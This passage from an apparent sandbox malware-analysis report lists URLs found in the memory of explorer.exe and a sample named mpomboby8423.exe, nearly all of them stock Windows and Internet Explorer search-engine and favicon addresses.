Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.chol.com/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.daum.net/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.empas.com/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&q=
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&q=
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&q=
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&p=
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search2.estadao.com.br/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 00000006.00000000.2116557071.0000000004F30000.00000002.00000001.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://service2.bfast.com/
Source: mpomboby8423.exe, 00000004.00000002.2104829039.0000000000D17000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2114936795.0000000003E27000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 00000006.00000000.2115674009.00000000042CB000.00000004.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
Source: explorer.exe, 00000006.00000000.2123447217.000000000856E000.00000004.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2116151786.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://udn.com/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://uk.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 00000006.00000000.2116151786.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: mpomboby8423.exe, 00000004.00000002.2104829039.0000000000D17000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2114936795.0000000003E27000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000006.00000000.2126479275.000000000A330000.00000008.00000001.sdmp	String found in binary or memory: http://www.%s.com
Source: explorer.exe, 00000006.00000002.2363837928.0000000001C70000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.co.uk/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&keyword=
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&tag=ie8search-20&index=blended&linkCode=qs&c
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.aol.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2116151786.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.com.tw/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.com/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.de/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.es/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.it/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.si/
Source: mpomboby8423.exe, 00000004.00000002.2104552065.0000000000B30000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2113776918.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.iask.com/favicon.ico
Source: mpomboby8423.exe, 00000004.00000002.2104829039.0000000000D17000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2114936795.0000000003E27000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000006.00000000.2116151786.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&a=
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000006.00000000.2115552459.0000000004263000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: explorer.exe, 00000006.00000000.2115552459.0000000004263000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/?ocid=iehpme2
Source: explorer.exe, 00000006.00000000.2122869349.000000000842E000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/?ocid=iehps
Source: explorer.exe, 00000006.00000000.2115552459.0000000004263000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
Source: mpomboby8423.exe, 00000004.00000002.2104552065.0000000000B30000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2113776918.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.nifty.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 00000006.00000000.2113162217.00000000039F4000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000006.00000000.2122657070.000000000839A000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000006.00000000.2122657070.000000000839A000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerp
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.recherche.aol.fr/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.servicios.clarin.com/
